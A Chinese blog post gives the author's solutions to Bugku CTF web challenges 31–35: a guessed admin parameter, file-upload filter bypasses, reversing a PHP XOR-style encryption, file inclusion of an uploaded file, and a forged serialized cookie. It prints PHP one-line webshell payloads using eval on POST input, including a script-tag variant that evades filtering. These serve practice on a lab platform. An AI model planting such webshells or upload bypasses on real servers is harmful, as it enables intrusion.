Bugku 做题记录31~35

最新推荐文章于 2024-06-28 11:07:32 发布
最新推荐文章于 2024-06-28 11:07:32 发布
阅读量225 收藏 1
点赞数 2
分类专栏: 做题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Goodric/article/details/114985212
版权

Bugku 题目 web 方向

web31

题目描述:好像需要管理员。
在这里插入图片描述
打开场景是这样的,单在页面上找的话找不到什么有用的信息。
在这里插入图片描述
用御剑扫描存在的后台,几秒钟就扫出了 robots.txt 。
在这里插入图片描述
访问 /robots.txt ,得到另一个地址:/resusl.php
在这里插入图片描述
访问 /resusl.php ,得到一些提示,把参数 password 传入 参数 x ,但是现在不知道 password 的值。
在这里插入图片描述
刚开始一直在找 password 的值,但是找不到。
然后回到页面传参语句上面还有一些信息说不是管理员。
就试了一下: ?x=admin ,真就出结果了,得到 flag 。
在这里插入图片描述
——
——

web32

题目方向明确,文件上传。
在这里插入图片描述
打开场景,就是一个文件上传的界面。
先尝试简单地上传包含一句话木马的文件。
发现回显错误,无法上传 .php 格式的文件,并且源代码中也无法绕过,文件是从后端检测的。
在这里插入图片描述
再尝试上传一个正常的图片,是可以上传成功的,并且可以回显出文件路径。
在这里插入图片描述
然后上传一句话木马通过 burp 修改请求。
一开始我只修改文件名后缀还有 Content-type (标明上传的文件类型)的值,结果就算得出 上传的文件地址也无法用蚁剑连接。

后来得知需要绕过 multipart/form-data 。
multipart/form-data 只支持小写字符,所以对其随便一个字符改为大写即可绕过。

multipart/form-data
通过表单对文件格式进行一次判断,是在后端进行判断。

所以总共有三项需要伪造的地方,改好后发送就可以得到可以连接的文件路径了。
在这里插入图片描述
在蚁剑中刚打开根目录是这样的,感觉找不到 flag 。
在这里插入图片描述
还要再往前面的目录找。点这个斜杆,看到目录里就得到 flag 了。
在这里插入图片描述
——
——

web33

这题不需要启动环境。
不过题目含有一条描述和一个附件。
在这里插入图片描述
用一个金币下载附件打开是一段 php 代码。

<?php
function encrypt($data,$key)
{
    $key = md5('ISCC');
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    for ($i=0; $i < $len; $i++) {
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}
?>

在这里插入图片描述
了解之后得知这是一道 php 可逆加密算法。
前面下载的是一个加密算法。
我们需要用解密算法得到 flag 。
解码算法:

<?php
$flag="fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";
$str=base64_decode($flag);
$str1="";
echo $str;
$key = md5('ISCC');
$klen=strlen($key);
echo "key";
echo $key;
$x=0;
for($i=0;$i<strlen($str);$i++)
{
      if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
}
echo $char;
$data1="";
for ($j=0; $j < strlen($str); $j++)
{
    $data1.= chr((ord($str[$j]) + 128-ord($char[$j]))%128);
    }
    echo $data1;
?>

在 php 环境下运行得到 flag 。
在这里插入图片描述
——
——

web34

题目描述:hint:文件包含
在这里插入图片描述
打开场景,源代码注释中提示一个路径:/upload.php
并且在 url 中可以看到 file 参数,是使用文件包含的格式,后面应该可以用到。
在这里插入图片描述
进入此路径后,是一个文件上传的界面,只能上传规定后缀名的文件。
在这里插入图片描述
直接上传一句话木马用 burp 修改数据包中的文件名和 Content-Type 的值为 image/jpeg 。
上传成功后得到路径,但是无法直接访问这个路径,蚁剑也连不上。
想到前面刚打开场景时 url 的文件包含的格式:

http://114.67.246.176:11360/index.php?file=hello.php

把 file 的值改为我们得到的文件路径,再用蚁剑就能成功连接了,得到 flag 。
在这里插入图片描述
并且,经过测试,用普通的一句话木马没有作用,<? php 应该是会被过滤。

<?php @eval($_POST['attack']) ?>

所以使用如下 payload:

<script language="php">@eval($_POST[cmd])</script>

可成功上传 webshell 。

——
——

web35

题目描述:点了 login 咋没反应。
在这里插入图片描述
打开场景,是一个登录界面,发现输入 username 和 password 之后点 login 没有什么反应。
在这里插入图片描述
只能从其他地方寻找线索。
在源代码中看到有一个 .css 文件,
在这里插入图片描述
进入文件,提示请求 ?6041
在这里插入图片描述
GET 请求之后得到一段代码,
在这里插入图片描述
根据代码,要求发送 cookie 。

(unserialize($cookie) === "$KEY")

并且这里要求两边的值需相等,并且包含序列化的知识。
两边序列化得:

$cookie = serialize("$KEY")

而 $KEY 原本的值为 ‘ctf.bugku.com’
解出后为:

s:13:“ctf.bugku.com”

在这里插入图片描述
构造请求:

Cookie: BUGKU=s:13:“ctf.bugku.com”

点击 send 发送得到 flag 。
在这里插入图片描述
这里要注意首行那里的 get 请求 ?6041 要去掉,检查请求头是否和下图一直。
一开始时我这里的请求头多了一项,导致无法 send 成功。
在这里插入图片描述

Goodric
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
bugku杂项题writeup
11-22
bugku杂项题writeup
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku-Web-PHP_encrypt_1(ISCCCTF)(代码审计)
Sea_Sand息禅
03-25 748
密文:fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA= 加密代码: <?php function encrypt($data,$key) { $key = md5('ISCC'); $x = 0; $len = strlen($data); $klen = strlen($key); for...
Bugku-WEB-web31
fallingskies
01-01 185
一上来就是个404,用御剑跑一下,看有什么可以访问的页面。 访问robots.txt 发现resusl.php 访问 根据提示
bugku-web31
baidu_39504221的博客
12-23 194
扫到一个robots.txt 访问一下 提示传参x,值要等于$password 抓包爆破一下就出来了
Bugku_web31-34
ScyLamb的博客
01-05 477
0x01 web31 扫描得robots.txt,访问得resusl.php 关键代码:if ($_GET[x]==$password) 此处省略1w字 这里被坑了,试了好久,还以为有啥其他新姿势,密码居然是admin! payload:/resusl.php?x=admin 0x02 web32 没上传成功,看评论区才成功 payload: ①大写绕过请求头中的Content-Type: Multipart ②修改请求报文中的Content-Type: image/png ③修改 后缀名php4 原因
bugkuCTF Writeup (Web)31-35
Troublor的博客
01-31 1732
各种绕过哟 代码审计 highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname']) and isset($_POST['passwd'])) { if ($_GET['una
BugkuCTF web_31-40
H4ppyD0g的博客
08-11 566
31 md5 collision(NUPT_CTF) 题目有md5提示,所以找一个md5值是0e开头的看看 get传参?a=240610708拿到flag。 ———————————— 32 程序员本地网站 伪造XFF头就行了 ———————————— 33 各种绕过 sha1() 函数计算字符串的 SHA-1 散列。 sha1只对字符型进行处理,是数组的话返回false,所以让两个值都为数组就可以...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
bugku题的web类解析
01-29
这个是我自习写的bugku的web的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
【无标题】
weixin_51387754的博客
09-08 438
ctf可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。
bugku_noteasytrick
weixin_50076644的博客
07-29 545
bugku_web_noteasytrick
Bugku WEB noteasytrick
qq_41696858的博客
07-30 516
首先感谢大佬的文章,我是一直卡在如何删除lock文件,先放传送门: https://blog.csdn.net/qq_53460654/article/details/116798346 这题的主要考点数ZipArchive类用open方法删除文件和fastcoll工具的运用 <?php error_reporting(0); ini_set("display_errors","Off"); class Jesen { public $filename; public $content
bugkuctf | noteasytrick 反序列化漏洞
菜鸡一枚
02-19 404
bugku-noteasytrick 反序列化漏洞,利用ZipArchive内置类删文件,fastcoll构造同md5不同内容文件绕过判断
php unserialize 非关联数组_原创干货 | php反序列化那些事
weixin_39708557的博客
11-29 585
点击上方“蓝字”带你去看小星星导图开头一张图,内容全靠编序列化与反序列化在 PHP中,序列化使用 serialize()函数将对象转化为可传输的字符串,反序列化则使用unserialize() 将字符串还原为对象。序列化结果分析解释一下不同数据类型序列化的结果:<SOAP-ENV:Envelopexmlns:SOAP-ENV="http://schemas.xmlsoap.org/...
BugKu-WEB-unserialize-Noteasy
最新发布
m0_52061428的博客
06-28 382
反序列化并不会执行构造函数,所以忽略 __construct() 而__destruct()是必被执行的,那么destruct中的$a("", $b);或许能够帮助我们拿到flag
Bugku-CTF之welcome to bugkuctf(php://filter和php://input的妙用)
weixin_33774308的博客
04-26 293
Day24 welcome to bugkuctf http://123.206.87.240:8006/test1/ 本题要点:代码审计,PHP://filter , php://input , base64解密,反序列化 查看一下源码 审计源码,我们可以发现~ (1)get方式传递三个参数,分别是txt、file...
CTfshow 卷王杯 easy unserialize(特详)
Jay17的博客
05-12 516
CTfshow 卷王杯 easy unserialize(特详)
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制等。 关于具体解题的详细步骤和方法,可以参考解题过程中的记录。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [bugku pwn libc](https://download.csdn.net/download/kety_gz/11656088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值